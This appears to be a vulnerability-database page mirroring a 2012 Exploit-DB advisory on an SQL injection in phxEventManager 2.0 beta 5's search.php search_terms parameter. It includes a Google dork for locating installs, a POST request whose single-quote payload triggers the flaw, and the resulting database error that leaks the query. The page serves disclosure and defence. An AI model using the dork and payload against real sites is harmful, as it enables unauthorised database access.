header-logo
Suggest Exploit
vendor:
phxEventManager
by:
skysbsb
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phxEventManager
Affected Version From: 2.0 beta 5
Affected Version To: 2.0 beta 5
Patch Exists: NO
Related CWE: N/A
CPE: a:phxeventmanager:phxeventmanager:2.0beta5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/*nix
2012

phxEventManager 2.0 beta 5 search.php search_terms SQL Injection Vulnerability

A SQL injection vulnerability exists in phxEventManager 2.0 beta 5 search.php search_terms parameter. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of arbitrary data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: phxEventManager 2.0 beta 5 search.php search_terms SQL
Injection Vulnerability
# Date: 01/03/2012
# Author: skysbsb
# Software Link: http://sourceforge.net/projects/phxeventmanager/
# Version: Web Application
# Tested on: Apache/*nix
# Dork: intext: "Powered by phxEventManager"
# Code :

Exploited Link :

URL: http://vulnsite.com/path_to_pem/search.php?
POSTDATA:
datasubmit=1&searchtype=events&s_event_names=on&s_event_descriptions=on&s_event_presenters=on&s_event_contacts=on&search_terms='

Result:

MDB2 Error: syntax error, _doQuery: [Error message: Could not execute
statement] [Last executed query: SELECT * FROM pem_entries as e, pem_dates
as d WHERE e.id = d.entry_id AND () AND e.entry_status != 2 AND
d.date_status != 2 AND (e.entry_visible_to_public = 1 AND
d.date_visible_to_public = 1) AND (e.entry_status != 0 AND d.date_status !=
0) AND d.when_begin >= DATE_SUB(CURDATE(),INTERVAL 1 YEAR) ] [Native code:
1064] [Native message: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ') AND e.entry_status != 2 AND d.date_status != 2 AND
(e.entry_visible_to_public ' at line 1]

#skysbsb mailto:skysbsb[atttt]gmail.com



-- 
David Gomes Guimar�es

Navigation

Suggest Exploit

Services By CQR